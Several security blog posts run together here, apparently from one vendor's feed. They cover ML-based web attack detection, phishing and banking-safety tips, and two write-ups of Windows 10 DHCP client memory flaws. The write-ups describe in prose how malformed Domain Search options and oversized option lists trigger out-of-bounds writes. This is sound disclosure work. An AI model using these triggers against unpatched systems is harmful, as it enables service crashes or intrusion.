During the webinar, Michael Downs will explain how telecommunication providers can establish ongoing security and data protection processes, and shift from a check-box approach to proactive protection – an essential step for operators in order to effectively fight modern threats. A GDPR expert will also join the discussion to offer attendees insights into how the legislation impacts the telecoms industry and the compliance issues many are facing. 

This immersive session will also include interactive polls and self-assessment surveys to help participants better understand the challenges their company faces and the ways they can improve their overall security posture.

Register hereTelecom privacy and security: how to do the math

Detecting Web Attacks with a Seq2Seq Autoencoder

$
0
0

Attack detection has been a part of information security for decades. The first known intrusion detection system (IDS) implementations date back to the early 1980s.

Nowadays, an entire attack detection industry exists. There are a number of kinds of products—such as IDS, IPS, WAF, and firewall solutions—most of which offer rule-based attack detection. The idea of using some kind of statistical anomaly detection to identify attacks in production doesn’t seem as realistic as it used to. But is that assumption justified?

DETECTION OF ANOMALIES IN WEB APPLICATIONS


The first firewalls tailored to detect web application attacks appeared on the market in the early 1990s. Both attack techniques and protection mechanisms have evolved dramatically since then, with attackers racing to get one step ahead.

Most current web application firewalls (WAFs) attempt to detect attacks in a similar fashion, with a rule-based engine embedded in a reverse proxy of some type. The most prominent example is mod_security, a WAF module for the Apache web server, which was created in 2002. Rule-based detection has some disadvantages: for instance, it fails to detect novel attacks (zero-days), even though these same attacks might easily be detected by a human expert. This fact is not surprising, since the human brain works very differently than a set of regular expressions.

From the perspective of a WAF, attacks can be divided into sequentially-based ones (time series) and those consisting of a single HTTP request or response. Our research focused on detecting the latter type of attacks, which include:

  • SQL Injection 
  • Cross-Site Scripting
  • XML External Entity Injection 
  • Path Traversal
  • OS Commanding 
  • Object Injection 

But first let’s ask ourselves: how would a human do it?

WHAT WOULD A HUMAN DO WHEN SEEING A SINGLE REQUEST?


Take a look at a sample regular HTTP request to some application:


If you had to detect malicious requests sent to an application, most likely you would want to observe benign requests for a while. After looking at requests for a number of application execution endpoints, you would have a general idea of how safe requests are structured and what they contain.

Now you are presented with the following request:


You immediately intuit that something is wrong. It takes some more time to understand what exactly, and as soon as you locate the exact piece of the request that is anomalous, you can start thinking about what type of attack it is. Essentially, our goal is to make our attack detection AI approach the problem in a way that resembles this human reasoning.

Complicating our task is that some traffic, even though it may seem malicious at first sight, might actually be normal for a particular website.

For instance, let’s look at the following request:


Is it an anomaly? Actually, this request is benign: it is a typical request related to bug publication on the Jira bug tracker.

Now let’s take a look at another case:


At first the request looks like typical user signup on a website powered by the Joomla CMS. However, the requested operation is “user.register” instead of the normal “registration.register”. The former option is deprecated and contains a vulnerability allowing anybody to sign up as an administrator.

This exploit is known as “Joomla < 3.6.4 Account Creation / Privilege Escalation” (CVE-2016-8869, CVE-2016-8870).


HOW WE STARTED


We first took a look at previous research, since many attempts to create different statistical or machine learning algorithms to detect attacks have been made throughout the decades. One of the most frequent approaches is to solve the task of assignment to a class (“benign request,” “SQL Injection,” “XSS,” “CSRF,” and so forth). While one may achieve decent accuracy with classification for a given dataset, this approach fails to solve some very important problems:

  1. The choice of class set. What if your model during learning is presented with three classes (“benign,“ “SQLi,” “XSS”) but in production it encounters a CSRF attack or even a brand-new attack technique?
  2. The meaning of these classes. Suppose you need to protect 10 customers, each of them running completely different web applications. For most of them, you would have no idea what a single “SQL Injection” attack against their application really looks like. This means you would have to somehow artificially construct your learning datasets—which is a bad idea, because you will end up learning from data with a completely different distribution than your real data.
  3. Interpretability of the results of your model. Great, so the model came up with the “SQL Injection” label—now what? You and most importantly your customer, who is the first one to see the alert and typically is not an expert in web attacks, have to guess which part of the request the model considers malicious.

Keeping that in mind, we decided to give classification a try anyway.

Since the HTTP protocol is text-based, it was obvious that we had to take a look at modern text classifiers. One of the well-known examples is sentiment analysis of the IMDB movie review dataset. Some solutions use recurrent neural networks (RNNs) to classify these reviews. We decided to use a similar RNN classification model with some slight differences. For instance, natural language classification RNNs use word embeddings, but it is not clear what words there are in a non-natural language like HTTP. That’s why we decided to use character embeddings in our model.

Ready-made embeddings are irrelevant for solving the problem, which is why we used simple mappings of characters to numeric codes with several internal markers such as and .
After we finished development and testing of the model, all the problems predicted earlier came to pass, but at least our team had moved from idle musing to something productive.

HOW WE PROCEEDED


From there, we decided to try making the results of our model more interpretable. At some point we came across the mechanism of “attention” and started to integrate it into our model. And that yielded some promising results: finally, everything came together and we got some human-interpretable results. Now our model started to output not only the labels but also the attention coefficients for every character of the input.

If that could be visualized, say, in a web interface, we could color the exact place where a “SQL Injection” attack has been found. That was a promising result, but the other problems still remained unsolved.

We began to see that we could benefit by going in the direction of the attention mechanism, and away from classification. After reading a lot of related research (for instance, “Attention is all you need,” Word2Vec, and encoder–decoder architectures) on sequence models and by experimenting with our data, we were able to create an anomaly detection model that would work in more or less the same way as a human expert.

AUTOENCODERS


At some point it became clear that a sequence-to-sequence autoencoder fit our purpose best.
A sequence-to-sequence model consists of two multilayered long short-term memory (LSTM) models: an encoder and a decoder. The encoder maps the input sequence to a vector of fixed dimensionality. The decoder decodes the target vector using this output of the encoder.

So an autoencoder is a sequence-to-sequence model that sets its target values equal to its input values. The idea is to teach the network to re-create things it has seen, or, in other words, approximate an identity function. If the trained autoencoder is given an anomalous sample it is likely to re-create it with a high degree of error because of never having seen such a sample previously.



THE CODE


Our solution is made up of several parts: model initialization, training, prediction, and validation.
Most of the code located in the repository is self-explanatory, we will focus on important parts only.

The model is initialized as an instance of the Seq2Seq class, which has the following constructor arguments:


After that, the autoencoder layers are initialized. First, the encoder:


And then the decoder:


Since we are trying to solve anomaly detection, the targets and inputs are the same. Thus our feed_dict looks as follows:


After each epoch the best model is saved as a checkpoint, which can be later loaded to do predictions. For testing purposes a live web application was set up and protected by the model so that it was possible to test if real attacks were successful or not.

Being inspired by the attention mechanism, we tried to apply it to the autoencoder but noticed that probabilities output from the last layer works better at marking the anomalous parts of a request.


At the testing stage with our samples we got very good results: precision and recall were close to 0.99. And the ROC curve was around 1. Definitely a nice sight!


THE RESULTS


Our described Seq2Seq autoencoder model proved to be able to detect anomalies in HTTP requests with high accuracy.


This model acts like a human does: it learns only the “normal” user requests sent to a web application. It detects anomalies in requests and highlights the exact place in the request considered anomalous. We evaluated this model against attacks on the test application and the results appear promising. For instance, the previous screenshot depicts how our model detected SQL injection split across two web form parameters. Such SQL injections are fragmented, since the attack payload is delivered in several HTTP parameters. Classic rule-based WAFs do poorly at detecting fragmented SQL injection attempts because they usually inspect each parameter on its own.

The code of the model and the train/test data have been released as a Jupyter notebook so anyone can reproduce our results and suggest improvements.

Conclusion


We believe our task was quite non-trivial: to come up with a way of detecting attacks with minimal effort. On the one hand, we sought to avoid overcomplicating the solution and create a way of detecting attacks that, as if by magic, learns to decide by itself what is good and what is bad. At the same time, we wanted to avoid problems with the human factor when a (fallible) expert is deciding what indicates an attack and what does not. And so overall the autoencoder with Seq2Seq architecture seems to solve our problem of detecting anomalies quite well.

We also wanted to solve the problem of data interpretability. When using complex neural network architectures, it is very difficult to explain a particular result. When a whole series of transformations is applied, identifying the most important data behind a decision becomes nearly impossible. However, after rethinking the approach to data interpretation by the model, we were able to get probabilities for each character from the last layer.

It's important to note this approach is not a production-ready version. We cannot disclose the details of how this approach might be implemented in a real product. But we will warn you that it's not possible to simply take this work and "plug it in." We make this caveat because after publishing on GitHub, we began to see some users who attempted to simply implement our current solution wholesale in their own projects, with unsuccessful (and unsurprising) results.

Proof of concept is available here (github.com).

Authors: Alexandra Murzina, Irina Stepanyuk (GitHub), Fedor Sakharov (GitHub), Arseny Reutov (@Raz0r)

Further reading


  1. [Understanding LSTM networks
  2. [Attention and Augmented Recurrent Neural Networks]
  3. 

[Attention is all you need
  4. 
[Attention is all you need (annotated)
  5. 
[Neural Machine Translation (seq2seq) Tutorial]
  6. 
[Autoencoders]
  7. [Sequence to Sequence Learning with Neural Networks]
  8. 
[Building autoencoders in Keras]


How Not To Help Hackers: 4 Common Security Mistakes Of Office Workers

$
0
0
Image credit: Unsplash

More and more often cybercriminals target office staff, knowing full well that people are the weakest link in the corporate protection systems. Today we'll discuss mistakes in information security made by office workers, and how to avoid becoming an unwitting accomplice to hackers in compromising company infrastructure.


Carelessness when following a link


According to Positive Technologies research, the most efficient method of social engineering in attacks targeting company staff is an email with a phishing link. The study showed that 27 percent of users followed such links.

Employees are often careless when reading the URL address of a link in a message. Attackers can register domain names similar to those of well-known organizations or partners of a specific company. Often the only difference is one or two symbols in the address.
They use this address to create a fake site that looks like a legitimate web page. When a careless user gets on that site, he or she may provide data that can be used in a successful attack on the user's company—such as login and password for entering corporate IT system. An antivirus can block malicious attachments, but there's no protection against a user who willingly discloses his or her password.

Solution: users must be vigilant and think before following links received in the mail. Make sure you check the sender of the letter, see if you are really the intended recipient, verify if the URL in the message matches the address of the company actually owning the site. If in doubt, don't follow the link.

Downloading suspicious files


Another common method of penetrating corporate infrastructure is sending messages with malicious attachments. When someone downloads and opens such a file, it installs a virus or a backdoor on the victim's computer, which gives the attacker full access to the computer and he or she can use it as a foothold to further infect the infrastructure.

Attackers play on fear, greed, hope, and other emotions to improve the efficiency of their attacks. So in the subject line of their message they use words like "list of staff to be discharged" or "annual bonus payment". Curiosity as to how much a colleague earns or fear of getting fired can be a powerful thing causing one to forget basic security rules. In an experiment conducted by Positive Technologies, almost 40 percent of mock phishing emails with "layoffs" in the subject line spurred users into taking a potentially dangerous step.

Users who received a suspicious file in a message not only open it, but often forward the message to colleagues (for instance, from IT department). Since the colleagues know the forwarder, they also open the file, and as a result the virus quickly spreads through the company infrastructure.

Solution: just like with phishing links, you can counter emails with malicious attachments by staying as vigilant as possible. Never download and run files from unknown senders, now matter how intriguing the file name may sound. Don't ignore antivirus warning messages, either.

Carelessness when speaking on the phone


It turns out that Internet attacks are not the only way attackers can fool gullible office staff. Often intruders use a phone call as a means of social engineering. Attackers call company staff, posing as colleagues from IT support, for instance, and elicit sensitive information or force the person to take an action they need to launch an attack.

A classic example is a call early on Sunday morning requesting someone to immediately get to the office. Few people would be happy to go, they may not even be able to, and then the caller suggests they simply give their password so that an "expert" takes care of everything. Many people are happy to oblige.

Solution: under no circumstances provide confidential data over the phone. If "someone from IT department" calls you and asks for your password, this should be enough to raise suspicion, because in reality IT staff do not need to get this information from the user in order to do their job.

Use of public Wi-Fi networks for work


Another popular way of stealing confidential user data is using a public Wi-Fi networks. Attackers can create a "lookalike" of popular public networks operating in the vicinity of the company's office.

Names of such fake access points usually sound like legitimate ones. If a user's device is set to connect automatically, it is very likely to connect to this fake access point. If the employee uses his or her cell phone for work or sends important data from it, the attackers can get that data.

Solution: avoid using public Wi-Fi networks to connect to corporate resources without VPN. If, for whatever reason, you can't use VPN, but you really need to log on right now, make sure the target access point uses WPA/WPA2 encryption. If it does, your device should display a message when you connect.

Insecure password storage


An attack is not always launched from the outside. In many cases confidential data is stolen by an internal attacker. According to a study by Positive Technologies, 100 percent of such attacks result in full control over the network. Employees contribute to that by incorrect handling of passwords. Recently many companies have implemented password security policies requiring the users to change their passwords regularly and make them complex enough. But many people don't want to memorize a complex password. Often they write it down on a paper and keep it next to their computer. In this case the attacker easily gets access to the employee's account.

Solution: never keep passwords in cleartext. If you want to write down a password, use the method suggested by Bruce Schneier, where instead of your password you write down some clues which will help you recall it.

Conclusion


Human factor is one of the main issues in ensuring security of corporate systems. More and more often attackers choose to slip into the corporate network by attacking the employees, rather than hacking into the infrastructure directly from outside the perimeter.

To prevent attackers from getting inside your company's infrastructure, follow the basic information security rules. Do not follow suspicious links, be careful when downloading email attachments, don't provide important information over the phone, and don't store passwords in cleartext.


Protecting Money On The Internet. Five Tips To Secure Your Online Transactions

$
0
0
Image credit: Unsplash
According to Positive Technologies research data, security of financial applications keeps growing. Banks make serious investments into improving security of their products. In the end hackers find it easier not to attack the banks, but rather go after bank clients and people shopping online.

Here are some useful tips from Positive Technologies experts to help you protect your money online.

Make transactions only using secure sites


A basic rule of online payments security is to never use your cards on untrusted sites. If you use a service for a long time and feel sure it is safe, you can make a transaction, but you should still stay cautious. For instance, check for encryption. Data must be transmitted via HTTPS, a secure protocol, rather than via HTTP.

Often attackers create copies of trusted sites, and sometimes such resources may be even higher in the search results than the original sites. That's why it is important to remember the exact URL of the resource you need and type that into your browser's address bar, rather than use a search engine. The best option is to add your bank's site or the site where you make a payment to your browser's bookmarks. Before you make any transaction, double-check the URL. It must not contain any extra symbols or replaced symbols (1 instead of I, for instance).

Get a separate card for online shopping


Using your primary card for online shopping is a bad idea. If that card is compromised, attackers could steal a lot. So it's better to use a special card where you keep a small amount, ideally transferring funds right before the transaction. Another option is to set a daily limit for operations with the card in your online bank settings. Then, even if an attack is successful, the hackers won't be able to steal all your money at once.

Some banks allow creating virtual cards for online shopping. That's a good function to use, if available.

Beware of phishing


Financial institutions nowadays make serious investments into improving security. They perform audits, use new software and hardware to detect attacks. Often the attackers find it easier to attack bank clients than the bank itself.

One of the most efficient ways of such attacks is phishing. Hackers may send letters to bank clients, allegedly from the bank's staff, and it is not so easy to tell at a glance if it is a fake. You need to remember the key rule: if the communication is from the bank, call the number on the back of your card to get clarification from the bank personnel and confirm their intent.

Control security of your devices


In addition to phishing, hackers can attack devices of the bank clients, too. To keep your computer and gadgets secure, make a habit of never downloading files from untrusted sites, never following suspicious links, and never downloading attachments from unknown senders.

When you launch a new app, it's important to check and analyze the permissions it requests. If a regular game wants access to your phone book, it should get you thinking why the app developers would need this.

Using antivirus on all computers and gadgets you use for online banking and online purchases is a must. Keep the programs on those devices updated. Often hackers get into a computer through vulnerabilities in obsolete software. Regular updates reduce the probability of such attacks.

Do not make online purchases from someone else's devices and using public Wi-Fi


Using someone else's computer for online payments is risky. There's no way to know what viruses may be found in a computer, for instance, in a cybercafe. Don't log into your online bank using public Wi-Fi, either. Your data can be easily intercepted by hackers.


DHCP security in Windows 10: analyzing critical vulnerability CVE-2019-0726

$
0
0
Image credit: Pexels
When January updates for Windows got released, the public was alarmed by news of critical vulnerability CVE-2019-0547 in DHCP clients. A high CVSS score and the fact that Microsoft did not release an Exploitability Index assessment right away, which made it more difficult for users to decide whether they needed to update their systems immediately, stirred up the heat. Some publications even speculated that the absence of the Exploitability Index pointed to the appearance of a usable exploit in the near future.

Solutions such as MaxPatrol can identify which computers on a network are vulnerable to certain attacks. Other solutions detect such attacks. For these solutions to work, both the rules for identifying vulnerabilities in products and the rules for detecting attacks on those products need to be described. This, in turn, will be possible if for each separate vulnerability we figure out the vector, method, and conditions of exploitation. In other words, all the details and nuances related to exploitation. This requires a much more in-depth and full understanding compared to what can usually be found in descriptions on vendors' sites or in CVE, for example:

The reason for the vulnerability is that the operating system incorrectly handles objects in memory.

So, to update our products with rules for detecting attacks targeting the newly discovered vulnerability in DHCP and rules for identifying affected devices, we needed to dive into all the details. With binary vulnerabilities, one can often get to the faults lying at their root by using patch-diff, which compares and identifies the changes to the binary code of an app, a library, or an operating system's kernel made by a specific patch or update fixing the error. But Step 1 is always reconnaissance.

Note: To go directly to the vulnerability description, without reading the DHCP concepts it's based on, you can skip the first several pages and go straight to the section titled "DecodeDomainSearchListData function".

Reconnaissance

Go to a search engine and go through everything currently known about the vulnerability. This time there's not much detail, and most of it is information recycled from the original publication on the MSRC site. This situation is typical for errors found by Microsoft during an internal audit.

From the publication, we find that we are dealing with a memory corruption vulnerability contained in both client and server systems running on Windows 10 version 1803 and that it manifests when an attacker sends specially crafted responses to the DHCP client. A couple days after, the page will also contain Exploitation Index ratings:


As we can see, MSRC gave a rating of 2 — Exploitation Less Likely. This means the error is very likely either non-exploitable, or exploiting it is so difficult that it would require too much effort. Admittedly, Microsoft does not have a habit of lowballing such scores. This is partly due to reputational risks, as well as the relative independence of the response center within the company. So let's assume that if exploitation is indicated as unlikely, that is probably true. We could finish the analysis then and there. But it's always a good idea to double-check and at least see what exactly the vulnerability was. While vulnerabilities may be diverse, they also tend to reoccur and pop up in other places.

On the same site we download the patch (security update) provided as an .msu archive, unpack it, and look for the files most likely to be related to client-side processing of DHCP responses. Lately this has become more difficult. Updates are now provided not as separate packages fixing specific errors, but as a single package containing all monthly fixes. This increases the number of unrelated changes that we must wade through to find what truly interests us.

In the plethora of files, our search turns up several libraries matching the filter, and we compare these with their versions on an unpatched system. The dhcpcore.dll library looks the most promising of all. Meanwhile BinDiff shows minimal changes:


In fact, more or less significant changes are made only to one function — DecodeDomainSearchListData. If you are well familiar with the DHCP protocol and its rarely used functions, you already have an idea of what list is handled by that function. If not, we move to Step 2: reviewing the protocol.

DHCP and its options

DHCP (RFC 2131 | wiki) is an extensible protocol whose extensibility is implemented by means of the options field. Each option is described by a unique tag (number, identifier), size of the data contained in the option, and the data itself. This practice is typical for network protocols, and one of these options "implanted" in the protocol is Domain Search Option, which is described in RFC 3397. It allows a DHCP server to set standard domain name endings on clients. Those will be used as DNS suffixes for connections set up in this way.

For example, let's say that on our client we have set the following name endings:

.microsoft.com
.wikipedia.org



Then, in any attempt to determine address by domain name, these endings will be plugged in to DNS requests one by one, until a match is found. For instance, if the user types ru in the browser address bar, DNS requests will be formed first for ru.microsoft.com and then for ru.wikipedia.org:


In fact, modern browsers are too smart, so they react to names similar to FQDN by redirecting to a search engine. So we will later provide the output of less "thoughtful" utilities:



The reader might think this is the essence of the vulnerability. In itself, the ability to alter DNS suffixes using a DHCP server, when any device on the network can be identified as such, is a threat to clients requesting any network parameters using DHCP. But that's not all. As evident from the RFC, this is considered quite legitimate and documented behavior. A DHCP server is, in effect, a trusted component able to impact devices that connect to it.

Domain Search option

The Domain Search Option number is 0x77 (119). As with all other options, it is coded by a single-byte tag with option number. And like most options, the tag is followed by a single-byte size of the data following the size. A DHCP message can contain more than one copy of the option. In this case, data from all such sections is concatenated in the same order as in the message.


In the example taken from RFC 3397 the data is divided into three sections of 9 bytes each. As seen from the picture, subdomain names in the full domain name are coded with a single-byte name length, followed by the name itself. The full domain name code ends in a null byte (null size of the subdomain name).

Also, the option uses the simplest data compression method: reparse points. Instead of the domain name size, the field might contain 0xc0. Then the next byte will establish the offset relative to the start of the data of the option used to search for the end of the domain name.
So, in our example, we have a coded list of two domain suffixes:

.eng.apple.com
.marketing.apple.com

DecodeDomainSearchListData function

The DHCP option with number 0x77 (119) allows the server to set DNS suffixes on clients. But not on computers with Windows operating systems. Microsoft systems have traditionally ignored this option, so historically endings of DNS names were applied using group policies, when necessary. But things changed recently, when the new release of Windows 10 version 1803 introduced handling for Domain Search Option. As follows from the function name in dhcpcore.dll that was changed, it is the added handler itself that contains the error.

Now let's get to work. Comb the code a little, and here's what we find. The DecodeDomainSearchListData procedure, as one might guess, decodes data from the Domain Search Option of the message received from the server. As input, it takes a data array packed as described earlier, and it outputs a null-terminated string containing a list of domain name endings separated by commas. For instance, the function will transform the data from the above example into the following string:

eng.apple.com,marketing.apple.com

DecodeDomainSearchListData is called from the UpdateDomainSearchOption procedure, which writes the returned list to the "DhcpDomainSearchList" parameter of the registry key:

HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{INTERFACE_GUID}\

which stores the main parameters for the specific network interface.


The DecodeDomainSearchListData function makes two passes. On the first pass, it performs all actions except making an entry to the output buffer. So the first pass is for calculating the size of memory needed to hold the returned data. On the second pass, memory is allocated for that data and the allocated memory is filled. The function is not too big—about 250 instructions—and its main job is to handle each of the three possible variants of the character in the incoming stream: 1) 0x00, 2) 0xc0, or 3) all other values. The fix for the error related to DHCP boils down to adding a check of the size of the resulting buffer at the start of the second pass. If the size is zero, memory is not allocated for the buffer, and the function completes execution and returns an error:


So the vulnerability shows itself only when the size of the target buffer is zero. And in the very beginning the function checks its inputs, whose size cannot be less than two bytes. Therefore, exploitation requires finding a non-empty domain suffix option formed in such a way that the size of the output buffer equals zero.

Exploitation

The first thing that comes to mind is using the reparse points to make sure that non-empty input data generates an empty string of output:



A server set up to respond with an option with such content will indeed cause an access violation on non-updated clients. Here is why. At every step, when the function parses part of the full domain name, it copies that part into the target buffer and appends a period. In this example from the RFC, the following data will be copied to the buffer in the following order:

1). eng.

2). eng.apple.

3). eng.apple.com.

Then, when the zero domain size is encountered in the input data, the function changes the previous character in the target buffer from a period to a comma:

4). eng.apple.com,

and keeps parsing:

5). eng.apple.com,marketing.

6). eng.apple.com,marketing.apple.

7). eng.apple.com,marketing.apple.com.

8). eng.apple.com,marketing.apple.com,

When input data ends, all that's left is replacing the last comma with a null character, and here's a string ready to be written to the registry:

9). eng.apple.com,marketing.apple.com

What happens when the attacker sends a buffer formed as described? From the example we can see the list it contains is made of a single element — an empty string. On the first pass, the function calculates the output data size. Since the data does not contain any non-zero domain name, the size is zero.

On the second pass, a heap memory block is allocated for the data and the data is copied. But the parsing function immediately encounters the null character indicating the end of the domain name, so, as explained before, it changes the previous character from a period to a comma. And then we have a problem. The target buffer iterator is set to zero. There's no previous character. The previous character belongs to the header of the heap memory block. And this character will be changed to 0x2c, which is a comma.

However, this happens only on 32-bit systems. Using unsigned int to store the current position of the target buffer iterator causes changes in handing on x64 systems. Let's look more closely at the fragment of code responsible for writing the comma to the buffer:


One is subtracted from the current position using the 32-bit register eax, but when addressing the buffer, the code addresses the full 64-bit register rax. On the AMD64 architecture any operations with 32-bit registers zero out the high halfword of the register. This means that the rax register, which used to contain a zero, will after subtraction store 0xffffffff and not –1. Therefore on 64-bit systems the value 0x2c will be written at the address buf[0xffffffff], way outside of the memory allocated for the buffer.

These findings strongly correlate with the exploitability scoring by Microsoft, because to exploit this vulnerability, an attacker has to learn how to perform remote heap spraying on the DHCP client, as well as have sufficient control of heap memory distribution to make sure that preset values (namely, comma and period) are written to the prepared address and cause controllable adverse effects.

Otherwise, writing the data to an unchecked address will result in failure of the svchost.exe process with all the services it may host at the moment, and subsequent restart of those services by the operating system. That's a fact attackers may also use to their advantage if circumstances permit.
This is seemingly all we can say about the studied error. But we still feel it's not the end. As if we have not yet considered every option. There must be more than meets the eye...

CVE-2019-0726

Most likely, that's the case. If we look closely at the type of data causing the error and compare that data with how exactly the error occurs, we can see that the list of domain names may be changed in such a way that the resulting buffer size will not be zero, yet there will still be an attempt to write it outside of the buffer. For that to happen, the first element of the list must be an empty string, and all others may contain nominal domain names. For example:


The option includes two elements. The first domain suffix is empty, it ends immediately in a null byte. The second suffix is .ru. The calculated size of the output string will be three bytes, allowing it to pass the check for empty target buffer introduced in the January update. At the same time, a zero at the very beginning of the data will force the function to write a comma as the previous character in the resulting string, but since the current position of the iterator in the string, as in the example before, is zero, it will write outside of the allocated buffer.

Now we need to confirm our theoretical results by a practical test. Let's simulate a case where the DHCP server responds to a client request with a message with the presented option, and we immediately find an exception when trying to write a comma at position 0xffffffff of the buffer allocated for the resulting string:


Here register r8 contains a pointer to incoming options, rdi contains the address of the allocated target buffer, and rax contains the position in that buffer where the character must be written. These are the results we got on a system with all updates installed (as of January 2019).

We wrote to Microsoft informing them of the problem, and guess what? They lost our message. Yes, this sometimes happens even to the best and most reputable vendors. No system is perfect, and in this case you need to find alternative ways of communication. A week later, having not received even an automated response, we made contact directly on Twitter. After several days of analysis we found that the details we sent had nothing to do with CVE-2019-0547 and actually formed a separate vulnerability, which will get a new CVE identifier. A month later, in March, a new patch was released, and the issue got a number: CVE-2019-0726.

This is how sometimes when trying to figure out a 1-day vulnerability, you may accidentally stumble upon a 0-day vulnerability, just by trusting your instincts.

Author: Mikhail Tsvetkov, Positive Technologies

How analyzing one critical DHCP vulnerability in Windows 10 led to discovery of two more

$
0
0
Image credit: Unsplash 
As described in our earlier article about CVE-2019-0726, sometimes a search for details of a known vulnerability leads to discovery of a new one. Sometimes even more than one.

The article touched upon two functions of the library dhcpcore.dll: UpdateDomainSearchOption, mentioned in passing, and DecodeDomainSearchListData which is called by the first function and was described in more detail. As always happens when looking for vulnerabilities, even if the important findings boil down to just one or two functions, there's a lot more code to review first. And occasionally you notice small things which are not relevant to the task at hand, but may have their own significance or may become useful later. Even if you have no time to dwell on them in the moment, your brain still takes note, and they surface again if after a while you get the chance to go back and check your guess.

This is exactly what happened this time. When researching the DhcpExtractFullOptions function responsible for processing all options in the DHCP response from the server, in particular the option calling UpdateDomainSearchOption, one's attention is immediately drawn to two arrays on the stack, each containing 256 elements:


And there's no sign of any checks limiting the values of iterators of these arrays. At the time we were dissecting a different vulnerability, so this information was not relevant. Therefore all we could do was remember this part of the code for later.

Analysis

A few weeks later, we thought back to the DhcpExtractFullOptions function that had caught our attention earlier. We took it in a disassembler, worked out the pieces of code that were not fully parsed, and tried to figure out what those two curious static arrays were for.

When function execution begins, the arrays and their iterators are zeroed out:


The function parses all options in the packet received from the DHCP server, collects information from them, and processes it. Also, based on the results of parsing, it logs the respective event in the ETW (Event Tracing for Windows) service. Logging of events is exactly where the buffers we are looking at are involved. Along with a lot of other data, these are passed to the EtwEventWriteTransfer procedure. Preparing all data for logging takes a lot of work, and is not very relevant to the vulnerability we are discussing, so we will skip the examples.

It's more important to see how those buffers are filled. Filling is part of the option parsing cycle. First, a function with the self-explanatory name ParseDhcpv4Option is called for the current option received for processing. It either fills the fields in the dhcp_pointers object using the received data, or makes a note about an unknown option if it encounters an option identifier for which there is no handler.


Once returned from ParseDhcpv4Option, the value of the identifier for the current option option_tag is written to the next element of the all_tags array, the first of the arrays we are looking at. If the function encounters an unknown option and therefore did not set the is_known_option flag, the value of the identifier is also written to the next element of the second array—unknown_tags. Of course, the variables mentioned in this article got meaningful names only after code analysis.

So, the all_tags array stores tags of all options from the received message, while the unknown_tags array has only the tags for options unknown to the parser. And there is no check at all for the indices of the arrays. Therefore, the values of those indices can exceed 256 and cause writes outside of the memory allocated for the arrays on the stack. To cause overflow of the first array, it's enough for the DHCP server to send a packet with more than 256 options. The same stays true for the second array, with the only difference being that we need to send options that the client cannot handle.

Exploitation

Now let's try to test our theoretical conclusions in practice. First let's note that an option tag is one byte in size, while the array elements have the type int, which means an element size of four bytes. We therefore have an overflow where we control every fourth byte, and the rest are zeroed out on overwrite.


The easiest way to test our assumption is to overwrite the security cookie of the function stored in the stack, which will cause an exception related to a security check. Let's simulate a situation in which the DHCP server sends a large enough number of options to cause an overwrite. Let's say there are 0x1a0 (416) options with identifier 0xaa and zero size. So the size of each option is two bytes, and the total size of the packet with all headers will be 1100—1200 bytes. This value is within the MTU limit for Ethernet, therefore we have reason to believe the message will not be fragmented, which will help us to avoid any complications.

We send the packet formed this way in response to a request from the DHCP client and on the client's computer we capture an exception in the respective svchost.exe process:


As we can see from the stack trace, option identifiers from our packet overwrote both the stack cookie and the return address for the function.

Of course, creating a usable exploit for this fault would require significant effort from the attacker. On modern systems, a buffer stack overflow is a complex and hard-to-exploit vulnerability due to all the modern protection mechanisms. On the other hand, let's not forget that all those mechanisms protect return addresses and exception handlers from being overwritten, prevent execution of code in memory locations not assigned for that purpose, or prevent prediction of addresses. But, for instance, they can do nothing against overwriting of local variables stored on the stack between the overflowing buffer and return address. And the DhcpExtractFullOptions function contains several potentially dangerous variables in that range.

We wrote to Microsoft again to inform about the bug we found. After some correspondence, and after analysis of the request lasting about a week, we got a response saying that a CVE identifier for this vulnerability was being prepared, a patch was scheduled for release in March, and the vulnerability had been already reported to Microsoft by someone else. This is not very surprising: the fault is in the open and buffers without checks on the index limits are always the first to draw attention. Quite often they can be found by automated analysis.

In March, as promised, there came a patch fixing the fault, now identified as CVE-2019-0697. The researcher who previously reported the vulnerability was Mitch Adair, the same Microsoft employee who also found DHCP vulnerability CVE-2019-0547, fixed in January.

Author: Mikhail Tsvetkov, Positive Technologies

Four ways to phish: how to avoid falling for scammers' bait

$
0
0

Phishing is one of the main cybersecurity threats targeting Internet users. Today we will describe how these attacks work and how not to become a victim.

Emails from trusted companies

Attackers often target customers of a particular company. They impersonate that company and reach out to its customers, asking them to click a link to a fake website, where they are tricked into entering their credentials.

In the case of financial services, hackers can steal money from victims' accounts. Such attacks are conducted regularly. For example: in one all too typical case a few years back, attackers hit users of MyEtherWallet, a popular cryptocurrency wallet. Users received an email that accounts were blocked due to a software update, and therefore must click a link to regain access.

Trusting users landed on a website identical to the original myetherwallet.com. The only difference was that the last letter "t" in the URL had been replaced by a visually similar Unicode character ("ţ").


Such a tiny detail does not usually catch the eye, so one must always stay vigilant. Even if a message seems to come from a company you know, be careful about clicking links. If you have any doubt about whether an email is legitimate, contact the company right away via a phone number or email address indicated on the official website. And if you need to go to a page often, bookmark it instead of accessing it via email links.

Attacks via corporate email

Fake domains are a simple and effective tool for phishing. However, criminals keep inventing more sophisticated techniques. One of them is to use employee email addresses to conduct attacks. In such cases, hackers usually are targeting an entire organization. To gain a foothold on a company's infrastructure, they might send emails posing as contractors or colleagues.

They spice up messages with enticing subject lines—"bonuses," "reward," "wage increase," "vacation"—to immediately catch the attention of employees, who then download malicious attached files.


The Cobalt3 group has used such phishing messages as an initial vector in attacks on infrastructure. In some cases, messages were sent from the addresses of employees of real banks and integrators, whose infrastructure had been hacked. The messages usually came during working hours and looked quite credible.

In order not to fall victim to such attacks and prevent attackers from entering a company's network, employees should think twice before opening each message. Are you supposed to receive lists of employees' wages?  Why did you get this message? If in doubt, do not download the attached file—instead, show it to an IT or security specialist.

Attacks on social media profiles

Email is not the only way in for attackers, who increasingly target social media profiles. Social networks enable attackers to reach out to employees of a target company. If hackers manage to infect a device from which a victim connects to corporate Wi-Fi, they will be able to penetrate the corporate network.

Users with poor security awareness may use social networks to discuss business issues or even send sensitive documents. Even worse, employees sometimes use the same (or very similar) password for social networks and their work accounts.

This has worked to the advantage of the SongXY group, which participated in attacks against industrial companies and government institutions in CIS countries in 2017. The attackers surfed social networks for profiles of employees and sent messages to them.

A security assessment by Positive Technologies revealed that over 70 percent of tested employees responded to emails from potential attackers, and 21 percent followed unsafe links.

Social networks should not be used to discuss work issues, especially with strangers. Neither  are they a good place to send or receive sensitive files.

Phone phishing

Hackers do not limit themselves to just the Internet when attacking home users and employees. Phone conversations remain one of the simplest, tried-and-true instruments for social engineering.

